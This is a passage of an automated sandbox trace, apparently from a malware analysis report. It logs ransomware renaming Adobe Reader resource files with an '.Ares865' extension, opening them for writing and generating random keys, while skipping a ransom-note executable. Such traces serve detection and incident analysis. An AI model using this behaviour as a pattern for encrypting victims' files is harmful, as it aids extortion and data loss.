(lpString="sgr96.ths") returned 9 [0158.657] lstrlenW (lpString="Ares865") returned 7 [0158.658] lstrcmpiW (lpString1="r96.ths", lpString2="Ares865") returned 1 [0158.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths.Ares865") returned 105 [0158.658] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths.ares865"), dwFlags=0x1) returned 1 [0158.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=790528) returned 1 [0158.661] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.661] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.661] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.706] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.707] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.707] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.718] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slo.fca" | out: lpString1="slo.fca") returned="slo.fca" [0158.718] lstrlenW (lpString="slo.fca") returned 7 [0158.718] lstrlenW (lpString="Ares865") returned 7 [0158.718] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca.Ares865") returned 103 [0158.718] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca.ares865"), dwFlags=0x1) returned 1 [0158.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=736) returned 1 [0158.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.726] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.727] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slo.hyp" | out: lpString1="slo.hyp") returned="slo.hyp" [0158.727] lstrlenW (lpString="slo.hyp") returned 7 [0158.727] lstrlenW (lpString="Ares865") returned 7 [0158.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp.Ares865") returned 103 [0158.727] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp.ares865"), dwFlags=0x1) returned 1 [0158.730] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.730] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23552) returned 1 [0158.730] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.731] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.731] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.734] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.735] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.735] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.736] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slo113.hsp" | out: lpString1="slo113.hsp") returned="slo113.hsp" [0158.736] lstrlenW (lpString="slo113.hsp") returned 10 [0158.736] lstrlenW (lpString="Ares865") returned 7 [0158.736] lstrcmpiW (lpString1="113.hsp", lpString2="Ares865") returned -1 [0158.736] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp.Ares865") returned 106 [0158.736] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp.ares865"), dwFlags=0x1) returned 1 [0158.738] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=245702) returned 1 [0158.739] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.739] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.739] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.754] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.759] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slo32.clx" | out: lpString1="slo32.clx") returned="slo32.clx" [0158.759] lstrlenW (lpString="slo32.clx") returned 9 [0158.759] lstrlenW (lpString="Ares865") returned 7 [0158.759] lstrcmpiW (lpString1="o32.clx", lpString2="Ares865") returned 1 [0158.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx.Ares865") returned 105 [0158.759] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx.ares865"), dwFlags=0x1) returned 1 [0158.761] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32761) returned 1 [0158.762] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.763] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.763] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.767] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.767] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.767] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.768] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slv.hyp" | out: lpString1="slv.hyp") returned="slv.hyp" [0158.768] lstrlenW (lpString="slv.hyp") returned 7 [0158.768] lstrlenW (lpString="Ares865") returned 7 [0158.769] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp.Ares865") returned 103 [0158.769] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp.ares865"), dwFlags=0x1) returned 1 [0158.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0158.776] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.777] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.777] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.786] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.787] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slv137.lex" | out: lpString1="slv137.lex") returned="slv137.lex" [0158.787] lstrlenW (lpString="slv137.lex") returned 10 [0158.787] lstrlenW (lpString="Ares865") returned 7 [0158.787] lstrcmpiW (lpString1="137.lex", lpString2="Ares865") returned -1 [0158.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex.Ares865") returned 106 [0158.788] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex.ares865"), dwFlags=0x1) returned 1 [0158.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.790] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=333824) returned 1 [0158.790] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.791] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.807] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.808] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.808] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.813] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slv32.clx" | out: lpString1="slv32.clx") returned="slv32.clx" [0158.813] lstrlenW (lpString="slv32.clx") returned 9 [0158.813] lstrlenW (lpString="Ares865") returned 7 [0158.813] lstrcmpiW (lpString1="v32.clx", lpString2="Ares865") returned 1 [0158.813] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx.Ares865") returned 105 [0158.813] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx.ares865"), dwFlags=0x1) returned 1 [0158.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.817] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32767) returned 1 [0158.817] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.818] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.818] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.821] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.822] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.822] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.823] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="slvphon.env.Ares865" | out: lpString1="slvphon.env.Ares865") returned="slvphon.env.Ares865" [0158.823] lstrlenW (lpString="slvphon.env.Ares865") returned 19 [0158.823] lstrlenW (lpString="Ares865") returned 7 [0158.823] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0158.823] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dcf09c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn.fca", cAlternateFileName="")) returned 1 [0158.823] lstrcmpiW (lpString1="spn.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0158.823] lstrcmpiW (lpString1="spn.fca", lpString2="aoldtz.exe") returned 1 [0158.824] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="spn.fca" | out: lpString1="spn.fca") returned="spn.fca" [0158.824] lstrlenW (lpString="spn.fca") returned 7 [0158.824] lstrlenW (lpString="Ares865") returned 7 [0158.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca.Ares865") returned 103 [0158.824] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca.ares865"), dwFlags=0x1) returned 1 [0158.826] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.826] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=876) returned 1 [0158.826] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.827] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.827] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.830] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.830] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.831] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="spn.hyp" | out: lpString1="spn.hyp") returned="spn.hyp" [0158.831] lstrlenW (lpString="spn.hyp") returned 7 [0158.831] lstrlenW (lpString="Ares865") returned 7 [0158.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp.Ares865") returned 103 [0158.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp.ares865"), dwFlags=0x1) returned 1 [0158.834] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.834] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0158.834] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.835] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.835] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.838] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.838] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.838] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.839] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="spn24.hsp" | out: lpString1="spn24.hsp") returned="spn24.hsp" [0158.839] lstrlenW (lpString="spn24.hsp") returned 9 [0158.839] lstrlenW (lpString="Ares865") returned 7 [0158.839] lstrcmpiW (lpString1="n24.hsp", lpString2="Ares865") returned 1 [0158.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp.Ares865") returned 105 [0158.839] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp.ares865"), dwFlags=0x1) returned 1 [0158.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=212113) returned 1 [0158.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.856] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.857] CryptGenRandom 